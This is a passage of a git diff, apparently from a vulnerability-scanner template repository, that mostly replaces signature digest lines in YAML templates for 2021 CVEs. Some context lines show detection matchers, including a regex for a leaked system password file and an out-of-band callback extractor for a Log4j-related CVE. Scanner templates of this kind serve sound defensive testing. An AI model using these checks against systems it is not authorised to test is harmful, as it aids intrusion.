4b0a0048304602210083bcaebbe78d929e9a5accdf60a7efef53db53bea64e49bb0814edf3050e43bb022100aabd44ab42898c6c0950c8408de0d5dc833511a2a34729ce5f8234d3d0945f20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index 0db6a135c8..e1180ba9e8 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022021a070aa3c8c0a0942eca56b6541ac8767d7641ec6f53f7f1f0d44ede7b7443e022100bb101028725cccccf1bf04c69eb0922918d7676e3e8e0cee744465b2312ed470:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100848be2b8aecdd842f41d82bdc2459a74f3280a8867f29ffee600fc9607e38a77022100bf8a7cf936b174742eaf9eaebebf89e0cdfabb6716745501ab56dc7c21a078f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index cf79e0725e..358fa17448 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f8f5223addd5cd5385daf0ae7389af98c1285058934f637194dff04fd31e372b02204624243e2e92c713a26071920597fdfe1ae2b8f1e7583b8f66806ef8e71728f7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c77538591e44a43c9121b4d4aac5997c43431ad001eb5b663c446e371688368a022014fb1ea49078f138df27f764225f560e454f890573242fc43d230936ffe06069:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 63b78bf3a6..faa51e1148 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201f668ec65fa52250b11e0a5ff7e2578a66ae4fa7c4749fc2726af58592de176002204823060de15dc3cc8f4111380bd35ba9dcdbc74f978c01aca8194ad95a080bb3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cd35aae0b50e35de3d8db24e9fe9cbf7756d168658cf3feca33ec3766f58ddcf0221008cba451a2ae8cc17fb36db0c482b2365cb2919c2f8206dc26c93c8df7917cf58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index d9b95de57d..417f491ec0 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 401 - -# digest: 4a0a0047304502200779aec90981ff1e46d7524b69eb3d07bb4a3464594e6ec79c08df1ae52e53f60221008ceb7851c374f88acd1655ac9b3fdf6a370e86c5d17b105ed8e22011c52039e3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100deae46e5eda8c3688f277efde56e8419931778a04c03a5afe1909f7eb8bd58be02210086fd690e471c1f3fa7cb14a8e9540d1364875ed6318fe6d25fd90eb126670d24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index 17d6284f9d..fc8912187b 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022023124a9f5b860ebe8c7876103eb2b7e514dc836997c235b2475e215e04741d2a022100a23e25edc7ab5d2594ba844b63a26edb66907a624e4b9c1971a844a4ad791e47:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204b8f49eea3849b1906f4349b70bdd24794c845d7af86f51048d5f9071a17d9640221009d90595082301f556248110a3e7d1c410f4217385de6fa054fe307106062af36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index e28ac393f6..0d4d93c4b1 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022014f633a93e65fc5f3cf68e6066867bd500915361f2434a750a15db14525ff04d02204b972cf2d868a75acb08e175e2387b54fc458f668f691f0f10797b2c5288ac04:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207d65303201f9129519b221d9f14a826886b2183c91f85bc883594d04b9ba8ef7022100afb9f1c754db0a8549c627dcc49e6c2fd8eb58e9f5fdeadcc0f115b52eac216a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42667.yaml b/http/cves/2021/CVE-2021-42667.yaml index c5da45954c..b0ccc1336a 100644 --- a/http/cves/2021/CVE-2021-42667.yaml +++ b/http/cves/2021/CVE-2021-42667.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022069478f1182770a3594870f53c7f18813b760245777e214029b9380bf8fd8834f022100ed463953a073e1062406ba27aee600bd4f6b9331d81014aebcbee4a79b3c32f8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ccc3edb680809277a6823ca59a8c2c71c3dd99caa2ef8d9c9e8bcd538a8e81a402207330858a26e25a4f31ff4b7ddc9de685320c8c6da1275f5f078d9c01c3896696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index 39a3d93f49..963da19eb6 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 302 - -# digest: 4b0a00483046022100c6985e9cc05585cb464d4afbb61f82cc44fb54432b510f15105eeb79951cb83c022100b5cff67a25292d82ceb3c7a32f60dd0610b4af47ed34bfd9692a1e09ea0a07bd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100932f5c4a3f704da1060580a201dd80b5f3ab290ea9b7134711ea1f75f677f6b102203d84ceec35e81fae93a20f5a2ead4ad090d92f2fb08bd6acd19f39f31a749ed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index 1c657b7ebc..4853693162 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ede03c10c98a2bbf8bd08805b7feb95f4c0fa0ff686fce3fe765dde092b01d5f02206afc4e4ffbefbadeef1c43927b7272560d27b19668aa567fe1416de5d924173a:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022024a2efca9473b0adb16a559ae7cc2a2b26b2f008f97f24a1fc9eb544f02570ee0220579249d401287d3fbf11e96d4d004c8e36509bcf0fbbd3a2aa5c552a9a0be8b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index ef85fda1f1..feb84ac0a7 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022061e4a0878c234ba6c8838b8bed6ac1fd1c9fa74da31cac0969b6f7e15392654a022029463637cde539acca26a89668a04c24d22c738802b10515ba7c339a82aed240:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100af15d57dfc629c14ae5628c66f4d82dd6a7ff0366f5f5d9ba571a4b08d90a1db022100d145ef17579f0c5e9bca6e8467560b8df8bb3e536da046f3b5ca8f7caeb268e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43421.yaml b/http/cves/2021/CVE-2021-43421.yaml index d1ed74d9b2..4d849a9b9f 100644 --- a/http/cves/2021/CVE-2021-43421.yaml +++ b/http/cves/2021/CVE-2021-43421.yaml @@ -56,5 +56,4 @@ http: regex: - '"hash"\:"(.*?)"\,' internal: true - -# digest: 4a0a004730450221008902339693da5a01723eae4a2c0f3e1665dc5c1fa66e5ad6fcb400ffb368c48f0220374647602818a9e39475c77b0dd062bfa0b0d5d9fe3124d71270132493265ed2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022049e2ce890e53ef0bcf9c44baf54c02883e00ba08e62240dad28fcc6f189a93d0022100862453e4477f5e54580435eea80679c121c43871c5a4ba490870b23d1931f47f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml index 98ff422665..b448230a90 100644 --- a/http/cves/2021/CVE-2021-43495.yaml +++ b/http/cves/2021/CVE-2021-43495.yaml @@ -34,5 +34,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4a0a004730450220051a6a7c45027792bfa88307818110abbb4593bfd24db94249a36631047062b6022100ad600cb8cbdf1373dc01164b902b46a1bbdc67b442eb134704e4adcc98c0a1c9:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206c0384b67c9c278b15b0ab7d88f4760c054d645028b18ed37cae71f04c39ec28022069717a5981ed637dd902e692795d3fa77ae207a13f910887e979ba4377dc4f72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index c414079604..1c9e5463a7 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -34,5 +34,4 @@ http: part: body regex: - "root:.*:0:0:" - -# digest: 4a0a00473045022100e3da968d9bb9def650650b05955cd33de5f431989ecb940e5cf4a00ecd3afde302207a1bf8e0e2da3764d3bddc605b2ed987b66eb7515f5735388470bfcb64fa4cc7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d1b45854a63e011cdb7a9897cb06d4585775c744412800279c3c3a129f8198c402205ce8dbf08ded9d8ff3db1c1d846f0342a1dee48b00a2e498855b077bef3003df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index 4844cf11d0..fe9fdc47da 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -50,5 +50,4 @@ http: - 'contains(body_1, "{\"status\":\"success\"}")' - 'contains(body_2, "Welcome to Simple Client")' condition: and - -# digest: 4a0a00473045022100de85f9d078d7bcee40393388ed7781721e169645110e9dbd1ef2ebc36eae427302202c010e3812012267d961b93770821133e44a7a40c9de84184128bab30784f60d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200ed8d85680db1fdaca18e3946741a509b456c5a59af50ea2da3de976f81c88f4022100b7a4b1b90d678430cc8c9ae63915e369dd48b7a791449cbaac0922cafadbce64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index 00507e3bc6..596d0ffb55 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -54,5 +54,4 @@ http: - 500 - 403 condition: or - -# digest: 4b0a004830460221008d86e6b9972c4b6851ebc6e683ff64f3559305b6498758f7fa9ad73c65bbf56a0221009d3cdc08ac751399503fd12876020fd0f9ccb8ba1261be7b780ca5b6ac6644bd:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220533eda2d416acbb56be845742c82d66a906b68e16404572f0fa7859995ffc66a02201bfa0dc6a2f9366997bed9cb1cd55b96655ed4a8c13e07243c9540de09ea5da0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index b050376d07..14ef2fa15f 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e1abb7e6d4ee07446bc6ee9f76af35598816eac2f9c2ff2c621a16caebcc2f7202202d1eebe8587dd95b0a1a3fbfbe7f6fb02e396a9c0611d2ec411748798581e037:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008c259494eca72d26fdc7323f5c48da36d452977f30715571de6f48022302fa25022059f4ad7d108017c028098088b28716b2e26ad97ab12068321faa1cd363007a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43734.yaml b/http/cves/2021/CVE-2021-43734.yaml index 128fa35989..916f8d2c00 100644 --- a/http/cves/2021/CVE-2021-43734.yaml +++ b/http/cves/2021/CVE-2021-43734.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022021522ef8723759df1938809021bc51ef062ed5d6aa4eaa4e4b7b5e9fa3de3da3022100ed0467e3f228ed6c2b33b26ac07a6f34c7e180dcfbe2330ae8ca7468cdedd812:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201befe3d1439139ed8a951c98e42f37f0a5a43188cd8798497470fb3916ea6920022017567f5cef966508ec4e34a2a5ba31428209fc4f09dd949b6966723eaed55c9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43778.yaml b/http/cves/2021/CVE-2021-43778.yaml index 29fcac7820..3bb04c30b3 100644 --- a/http/cves/2021/CVE-2021-43778.yaml +++ b/http/cves/2021/CVE-2021-43778.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100fe076d57fad6236caec6089a3baae7764d5319056c5812366d5a13dbf9965da302200e7fa1fee1bdf878d05a5a662bc434466fc8da69677e0554059773a0d297d214:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200e628840e8cc0e8ba6821bb993add8c6e7e4747a61df0068d81a0b54f2d7a889022030f8b24da0912afc8f2a1d55eb83ee77d70c6fab5ab34add11d429ff231f1c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-43810.yaml b/http/cves/2021/CVE-2021-43810.yaml index cd0c9a6898..615d8220b2 100644 --- a/http/cves/2021/CVE-2021-43810.yaml +++ b/http/cves/2021/CVE-2021-43810.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b0d4724808c8d419f8a83986700643d3317e94f0d3608141936a2069a7942c6902203a0c33523d6a5cd3b0cf72b7c0b531e7ee7d0baa0ec1d3994d44e7c324507b50:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d54238ee3edefc491c4cce511e4b0fde02272fcc042f989355b4e5867a8e31d802205fc46f1421358458499d5a8418ec8c59a1af5f5dedd8871135fd471f8f01e01a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 78693ad73e..1993b278a7 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -54,5 +54,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502204a70495b7c74d24554d37f074887bb1335c65af29ee4143f695f6226510f3e2f0221008b22701b92cec15140f1cd975e85c0010fcbe834e63f86ee6277115284cfce8d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008375eeb0c1d5a007e8f9f2a3ff28a9eb1738143e2b9e4327fe30f49fe0f1dd4f0221009f501dec4f0db66cf49c6dddb5f47765707da32babcef0f6b02a26fd14d5db71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44139.yaml b/http/cves/2021/CVE-2021-44139.yaml index cfc22f2a46..3fc0fb247e 100644 --- a/http/cves/2021/CVE-2021-44139.yaml +++ b/http/cves/2021/CVE-2021-44139.yaml @@ -48,5 +48,4 @@ http: - '"success":true' - '"msg":"success"' condition: and - -# digest: 490a00463044022004180e10c80e7c1ba832ba1c6a0d2c8c0ff3b6010c3db1e8438f85a5530207d60220013c63c4e0b6eeab2ea24e6da4b6b977645afd0c47e94a3b155731c4adea50b6:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202e3ae396ddd143a0ea716700e16512b3ab4203ef2828a51d9e3a7b96259172d9022025f7bd255679f01d82f0d62ea1e565c560abce857b2e0b83cd42182c87efd87f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44152.yaml b/http/cves/2021/CVE-2021-44152.yaml index 9567bb0bd4..e52d44d286 100644 --- a/http/cves/2021/CVE-2021-44152.yaml +++ b/http/cves/2021/CVE-2021-44152.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b1b495dfbf66739a3887deca725b3d8d98cac82375cf3ff0aba802cc40e188270220534e66fe348b618fa3dc204d8d7aba671847b8ec36d6ab710a8aab2286f9107e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207a62a3fba1cd21f4afb0a1e06b1061ff96d4a725c718e4175c0dca37c405659d02207bebce10a8472ea606be15594401b7dac26241219d12e458ebff20324223cd56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44427.yaml b/http/cves/2021/CVE-2021-44427.yaml index b42bbafef0..37d4359f1b 100644 --- a/http/cves/2021/CVE-2021-44427.yaml +++ b/http/cves/2021/CVE-2021-44427.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009d3dca8a22bcfbeedc341c0251d34c2c6f3a085aee9ca4471431ed15745066170220095047f6e8ddabec1bff688ac1202b38f8fd5573f062d844d0bc5f0988c9e19d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bcdc429e6beb9a20d0d0525afbf96fdb58d55a2777602840cebeb52bd4fbd63802200222c19f5b1983340df3d954da5b0e541241cc185cfc0f1b60c313d1ea17ee78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index 3f9bbab942..5e9f80733b 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -71,5 +71,4 @@ http: - 'name="csrf_token" type="hidden" value="(.*)"' internal: true part: body - -# digest: 4a0a0047304502210081173ab16013bb5372401335b0df94daf280f3a5a1777b5c92c1e3f0c55434c902203f12b9b3b1e523ee6b3a401ef4167b6de9ad4806d8987c0d64278760eb542411:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e6ca50e0d2ec19f37bb8db140f6af9e958cad3afb444e90fec79bb5e80184151022100c5e6b21ae26d20cd76cac0638093fe8d89fdddd880da0086e1690f1e16160b20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index f305a4764d..72827b6b9a 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -46,5 +46,4 @@ http: - 302 - 307 - 308 - -# digest: 4b0a00483046022100d8b11268bb2477ef087adf11c0086ac1422e9e94577536cbbcf46437cbb08a25022100b6eb6aa6d61644377de479502edb381cbb98f659134fd36d88dfc56e65acaf8a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fdb08501ce30617bd27be9074f2a761e1f94e0a1cbaa3f7d2c9d08f661916fd902202611ad323998af7e64338d13141ccb91df0eb509d66b6294b477f8d8fbbdb038:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index beded005ed..e66eca38f3 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201fe4aafe98e2a75766536cbea53952f8e99710d58460f3bc96beec79893cbb4b02207cebe43a819e115bfb7f49930f32f59809f6f20ac7a33307ac0d5e3a10d66e62:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e509af84755c7c703fe984cfa765bc598aa45d20db018f02296c6f6df52a8d3b022100f436d948d845e16f9c2c2172f612a33ddc4360f8a8c79e9a51c7f7bcf223a04c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index 1b6e09112c..694124fdf4 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207507ee37b5e98f43c10b79ff9d319c2c4023bde3e55b398db2c00e5934956fef02207763d7e3e0d777bf90c3c4316b4323e10f6876984643f5cdedd11b43256c6f36:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221008d82532ad5c96a883910faa98657f10c5ba6598f45564c6deb0cffdff51129aa0221009457ef8f65106c941cfe56dabbe8f425994cd4d33ed551404af05d33d6a6be00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45043.yaml b/http/cves/2021/CVE-2021-45043.yaml index d371a25eb6..a1d3888480 100644 --- a/http/cves/2021/CVE-2021-45043.yaml +++ b/http/cves/2021/CVE-2021-45043.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022000d3cf32ba6186cb3ef396e534942356a93da5a03badd9ba9ac3822e4fa830e2022100d2d90a8ac4152218f64958dfa4ca6a009a7be76dc2fc0fcd78fe01e783bab1a0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022069fd30ba6b7296a03ddb40727f6527537701751b397f3cd777ea6e8b002d5bc3022100f4ebae53cb17bc245aa23560745731b935c2feb3f3a744140a7b7da631393c97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45046.yaml b/http/cves/2021/CVE-2021-45046.yaml index 9e1b555522..aa3d3f2408 100644 --- a/http/cves/2021/CVE-2021-45046.yaml +++ b/http/cves/2021/CVE-2021-45046.yaml @@ -78,5 +78,4 @@ http: regex: - '\d{3}\.\d{1}\.\d{1}\.\d{1}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted 127.0.0.1.${hostName} in output part: interactsh_request - -# digest: 4b0a00483046022100d32aad18a248d6653f88f700753670d037e7a29113ebaaff11b16417dee6b115022100d37c05569df653f6af6d951c24203d43892ab533c81d5bbb35d21b81fe733d40:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100872194374a5c45e66c027eb787566eaf7da0874e0f053448108e532590d91a8c0220256519bada4bc03aad9972adf585a6cd775810ceb2a5695d057cd6581bcc8f10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index 50b33777e1..9db749b1c4 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -37,5 +37,4 @@ http: - ".*vpath.*" - "thinfinity" condition: and - -# digest: 4b0a00483046022100a5c28838f19970505bff7818b4334555967b723fd73f2231257f678f37a7b888022100b11cddb97aa2b8b834301cc085ac3dcac54679b7282ca93c5948055f8df6efcb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204b3ef6816bf709d451667e91e621f22d1f2536ffaa88f0439ec3d0db480b13f802210097b141e69d263e4f318db43d55c44fea4ea66440f6417060d95956a1d7462381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index 3de5d413cb..d4f665223e 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e468c3dac25ab0111e94c3ca67b8700df005e62bf679aeb92a4bbef05fb35c5d0220172eaf9c39049a9bf7cdabf90ef1c253e2562b1f0ea201e3a75e3f3563deeb01:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008540cdbe9c4276ad2550717cadf3be8ce7633e2890eab95c7fba63e66b38349f02204f2b97df607355f8da034d8e9971d7fb68dea574b15dcc248f0cc5bdfec07669:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 1c03ec21da..4f2f5272ff 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220616a862f5150f67c87d6bd4b86caea6254f8b5db56ff3f3914942779841e53e8022073318dc07ae6b972e0afa6cc4e60e1e695d05869e516d31f054439c5f2398783:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d51f6538471d156b0fee98b97814cbed63e4182aa5ce9d6a0c5745b380715ac9022100c60021d3e70dfeb23d36530328027e99303f61d9fb6fc389047cde767cc45f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45428.yaml b/http/cves/2021/CVE-2021-45428.yaml index 6486d561a8..fcf36597f4 100644 --- a/http/cves/2021/CVE-2021-45428.yaml +++ b/http/cves/2021/CVE-2021-45428.yaml @@ -51,5 +51,4 @@ http: - 'status_code_1 == 404 && status_code_2 == 201' - 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200' condition: and - -# digest: 4a0a0047304502206c5c7de1919eee574120fdf32525718bbc205694df799ce1e1991b196f879924022100cfd303c4fca426740760a7c56945f5d93785483b235a95799ec05ebb676b043f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202d36fea1857422f1460dcf58bfcb09725776bd4db847b19384b8bcf4764e9c69022070f8e0fd161b77637b19e212e0e261dd642ce743d84451e944c1a3e4aed96c28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45967.yaml b/http/cves/2021/CVE-2021-45967.yaml index 36331cfaa2..5fb283c2de 100644 --- a/http/cves/2021/CVE-2021-45967.yaml +++ b/http/cves/2021/CVE-2021-45967.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d2ec3f8e1125857a95ef47ab52e2de7c2cb89e00702929dd7f525c050f4127df022007fc328ff2901460601d01edab18aecde9f8ef5d3cb8701dcd5200266f723891:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206073dea2c7020c8ddb825cd0558db19bc1c886c499a9129b1f032da92e370c4c02206161df31ef651a93e7ec8cd293a302f484622fb5468fb5b8721b71e97695290a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-45968.yaml b/http/cves/2021/CVE-2021-45968.yaml index 22102bca27..bcf805e01b 100644 --- a/http/cves/2021/CVE-2021-45968.yaml +++ b/http/cves/2021/CVE-2021-45968.yaml @@ -47,5 +47,4 @@ http: - "status_code_2 != status_code_1" - "contains(body_2, 'pascom GmbH & Co KG') || contains(body_3, 'pascom GmbH & Co KG')" # Verifying CMS condition: and - -# digest: 4a0a0047304502210098d2e0fdd3e4131dbe730456fe897ebc7f9c8cfd291545fcf94121d1f86b1d520220426b2f210d8c25af1186082adde24c3dd6950f285416b193717d808a8af80954:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100887812292374f4d62f2fcac3ffe0f7a0dcbdefa80188e63b5b59b819da7afcff022100a37de4f5c556ebef2595833b8bdc09639346118de447dbf37e70f080d6b8f502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index 16edda3071..ccc08eb02a 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -118,5 +118,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207bbdfe2ca770c6bc228ac0942f2fc45330d4f47b822fdb4e25df9b573203c1bc022001c112f5414c8d37f74d203855af60216b363af11a2eddae2e99153f3470b1f3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d13b3041b6fe2025d8b6a4c1b2851038edcd171b545e79e0b612077abee1070f0221009a197171748481fa1916a258fed52499c669ad601ddab299f7e6a91eb84bb239:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-46068.yaml b/http/cves/2021/CVE-2021-46068.yaml index d67b45538d..de6e616757 100644 --- a/http/cves/2021/CVE-2021-46068.yaml +++ b/http/cves/2021/CVE-2021-46068.yaml @@ -59,5 +59,4 @@ http: - "status_code_3 == 200" - 'contains(body_3, "Administrator\"> Admin")' condition: and - -# digest: 